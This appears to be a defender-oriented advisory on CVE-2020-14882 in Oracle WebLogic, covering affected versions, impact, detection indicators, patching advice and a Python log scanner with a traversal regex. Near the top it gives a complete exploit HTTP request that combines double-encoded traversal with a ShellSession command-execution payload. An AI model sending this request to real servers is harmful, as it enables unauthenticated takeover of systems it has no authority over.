CVE-2020-14882 is a critical unauthenticated Remote Code Execution (RCE) vulnerability in Oracle WebLogic Server’s Administration Console. An attacker can exploit it remotely — without any login credentials — using a specially crafted HTTP request to gain full control of the server.
- Vendor: Oracle
- Component: WebLogic Server Console
- CVSS v3.1 Score: 9.8 (Critical)
- Disclosure Date: October 2020
- Attack Vector: Network (HTTP request)
- Authentication Required: None
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: <Target IP>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 128
_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ipconfig');");
The following WebLogic Server versions are known to be vulnerable:
- 10.3.6.0.0
- 12.1.3.0.0
- 12.2.1.3.0
- 12.2.1.4.0
- 14.1.1.0.0
(Other patch levels or customized builds may also be at risk if not updated.)
The flaw lies in the WebLogic Administration Console’s improper input validation. By sending a specially crafted URL with double URL encoding, an attacker can bypass authentication and access internal server functions.
Typical exploit path example:
/console/css/%252e%252e%252fconsole.portal
Here %252e%252e%252f represents a double-encoded directory traversal sequence, allowing the attacker to escape the normal path and reach sensitive console code.
Once accessed, this can trigger remote command execution or webshell upload.
- Full remote code execution with the privileges of the WebLogic process.
- No authentication required.
- Complete system compromise possible — attackers can deploy malware, steal data, or pivot deeper into the network.
Common exploitation results:
- Deployment of JSP-based webshells
- Cryptomining or ransomware installation
- Persistence mechanisms added to compromised systems
- October 2020: Oracle releases a Critical Patch Update addressing CVE-2020-14882.
- Within days: Public proof-of-concept (PoC) exploits appear online.
- Following weeks: Massive wave of exploitation observed — attackers scanning and exploiting exposed WebLogic servers globally.
- Subsequent months: Used in several major attack campaigns (cryptominers, ransomware, espionage).
1. Access Logs
- Look for suspicious HTTP requests containing encoded traversal sequences such as %252e%252e%252fconsole or /console/css/.../console.portal.
2. File System Changes
- Unrecognized .jsp files appearing under application directories.
- New or altered .war deployments.
3. Process Activity
- The WebLogic java process spawning shell commands (/bin/sh, cmd.exe).
- Unexpected outbound network connections from the WebLogic host.
4. Persistence Artifacts
- Suspicious scheduled tasks or startup scripts.
- Communication with mining pools or command-and-control servers.
Immediate Actions:
- Patch Immediately — Apply Oracle’s October 2020 Critical Patch Update or later cumulative patches.
- Restrict Access — Limit WebLogic Console access to trusted IPs or management networks only.
- Block Exploits — Use a WAF or proxy rule to block requests containing encoded traversal patterns such as %252e%252e%252f.
- Disable Console if not required in production.
If Compromise Is Suspected:
- Isolate the affected system from the network.
- Search logs and file systems for IOCs mentioned above.
- Rebuild the system from a known-good image.
- Rotate credentials and check for lateral movement.
Regular expression for scanning logs:
(%25(2e|2E)){2}%25(2f|2F)
This captures double-encoded “../” traversal attempts (%252e%252e%252f, in either letter case) often used in CVE-2020-14882 exploits. It does not match single-encoded (%2e%2e%2f) or literal “...” variants such as /console/css/.../console.portal, so pair it with URL-decoding of the request path when hunting.
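As an added, defender-side example (not code from the original advisory), the pattern above applied to constructed Common Log Format lines, with a double-URL-decode fallback so the single-encoded and literal "..." variants from the detection section are flagged too. It assumes the request sits in the quoted "METHOD PATH HTTP/x.y" field and scopes matching to paths under /console/.

```python
import re
from urllib.parse import unquote

# Double-encoded "../": each "." is %252e and "/" is %252f, either letter case.
DOUBLE_ENCODED_TRAVERSAL = re.compile(r"(%25(2e|2E)){2}%25(2f|2F)")

# Assumed log layout: Common Log Format, request in the quoted
# "METHOD PATH HTTP/x.y" field.
CLF_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def is_suspicious(path: str) -> bool:
    """True when a request to the console path carries a traversal
    sequence, whether double-encoded, single-encoded or literal."""
    if not path.lower().startswith("/console/"):
        return False
    if DOUBLE_ENCODED_TRAVERSAL.search(path):
        return True
    # Decode twice so %252e -> %2e -> "." is seen the way the server sees it.
    decoded = unquote(unquote(path))
    return "../" in decoded


def scan_access_log(lines):
    """Return (line_number, path) for every line that looks like a
    CVE-2020-14882 probe against the Administration Console."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = CLF_REQUEST.search(line)
        if match and is_suspicious(match.group("path")):
            hits.append((number, match.group("path")))
    return hits


# Constructed sample lines (not real traffic); sources use documentation IPs.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Oct/2020:10:01:02 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4321',
    '203.0.113.7 - - [28/Oct/2020:10:01:09 +0000] "POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1" 200 512',
    '203.0.113.7 - - [28/Oct/2020:10:01:15 +0000] "GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 512',
    '198.51.100.2 - - [28/Oct/2020:10:02:00 +0000] "GET /console/css/.../console.portal HTTP/1.1" 200 512',
    '10.0.0.9 - - [28/Oct/2020:10:03:00 +0000] "GET /console/css/styles.css HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, path in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {path}")
```

Lines 2, 3 and 4 of the sample are reported; the ordinary console login and stylesheet requests are not.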
- Patch Management: Keep WebLogic up to date and test patches before deployment.
- Segmentation: Keep administrative consoles off public networks.
- Monitoring: Enable detailed logging and feed data to your SIEM.
- Incident Response Plan: Prepare automated alerts for abnormal console access patterns.
CVE-2020-14882 remains a textbook example of a critical enterprise RCE — easy to exploit, devastating in impact, and widely weaponized. It underscores the need for prompt patching, network isolation of management interfaces, and continuous monitoring for exploitation attempts.